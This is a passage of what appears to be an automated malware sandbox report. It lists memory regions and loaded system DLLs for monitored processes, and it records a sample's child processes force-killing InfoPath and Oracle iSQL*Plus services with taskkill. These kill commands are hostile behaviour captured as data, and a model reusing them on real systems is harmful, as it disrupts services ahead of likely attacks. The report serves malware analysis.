private name = "private_0x000007fffffd8000" filename = "" Region: id = 1084 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Thread: id = 21 os_tid = 0xa2c Thread: id = 101 os_tid = 0xb1c Thread: id = 107 os_tid = 0xb58 Thread: id = 113 os_tid = 0xb94 Thread: id = 114 os_tid = 0xb98 Process: id = "9" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x7affd000" os_pid = "0xa60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM infopath.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 472 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 473 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 474 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 475 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 476 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 477 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 478 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 479 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 480 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 481 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 482 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 483 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 484 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 485 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 486 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1085 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1086 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1087 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1088 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1089 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1090 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1091 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1092 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1093 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1094 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1095 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1096 start_va = 0x3e0000 end_va = 0x567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1097 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1098 start_va = 0x5b0000 end_va = 0x730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1099 start_va = 0x740000 end_va = 0x1b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1100 start_va = 0x1b40000 end_va = 0x1bfffff entry_point = 0x1b40000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1101 start_va = 0x1c30000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 1102 start_va = 0x1ce0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1103 start_va = 0x1df0000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 1104 start_va = 0x1e70000 end_va = 0x213efff entry_point = 0x1e70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1105 start_va = 0x2280000 end_va = 0x22fffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1106 start_va = 0x2300000 end_va = 0x237ffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1107 start_va = 0x2470000 end_va = 0x24effff entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 1108 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1109 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1110 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1111 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1112 start_va = 0x7fef7020000 end_va = 0x7fef7033fff entry_point = 0x7fef7020000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1113 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1114 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1115 start_va = 0x7fef7360000 end_va = 0x7fef7441fff entry_point = 0x7fef7360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1116 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1117 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1118 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1119 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1120 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1121 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1122 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1123 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1124 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1125 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1126 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1127 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1128 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1129 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1130 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1131 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1132 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1133 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1134 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1135 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1136 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1137 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1138 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1139 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1140 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1141 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1142 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1143 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1144 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1145 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1146 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1147 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1148 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1149 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1150 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 29 os_tid = 0xa64 Thread: id = 102 os_tid = 0xb34 Thread: id = 109 os_tid = 0xb74 Thread: id = 115 os_tid = 0xba0 Thread: id = 116 os_tid = 0xba4 Process: id = "10" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x7a21c000" os_pid = "0xa80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM isqlplussvc.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 760 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 761 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 762 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 763 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 764 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 765 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 766 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 767 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 768 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 769 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 770 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 771 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 772 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 773 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 774 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1151 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1152 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1153 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1154 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1155 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1156 start_va = 0x160000 end_va = 0x163fff entry_point = 0x160000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1157 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1158 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1159 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1160 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1161 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1162 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1163 start_va = 0x3c0000 end_va = 0x547fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1164 start_va = 0x550000 end_va = 0x6d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1165 start_va = 0x6e0000 end_va = 0x1adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1166 start_va = 0x1ae0000 end_va = 0x1b9ffff entry_point = 0x1ae0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1167 start_va = 0x1c00000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 1168 start_va = 0x1ce0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1169 start_va = 0x1e20000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1170 start_va = 0x1ea0000 end_va = 0x1f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 1171 start_va = 0x1f20000 end_va = 0x21eefff entry_point = 0x1f20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1172 start_va = 0x22e0000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1173 start_va = 0x2410000 end_va = 0x248ffff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1174 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1175 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1176 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1177 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1178 start_va = 0x7fef7020000 end_va = 0x7fef7033fff entry_point = 0x7fef7020000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1179 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1180 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1181 start_va = 0x7fef7360000 end_va = 0x7fef7441fff entry_point = 0x7fef7360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1182 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1183 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1184 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1185 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1186 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1187 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1188 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1189 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1190 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1191 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1192 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1193 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1194 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file 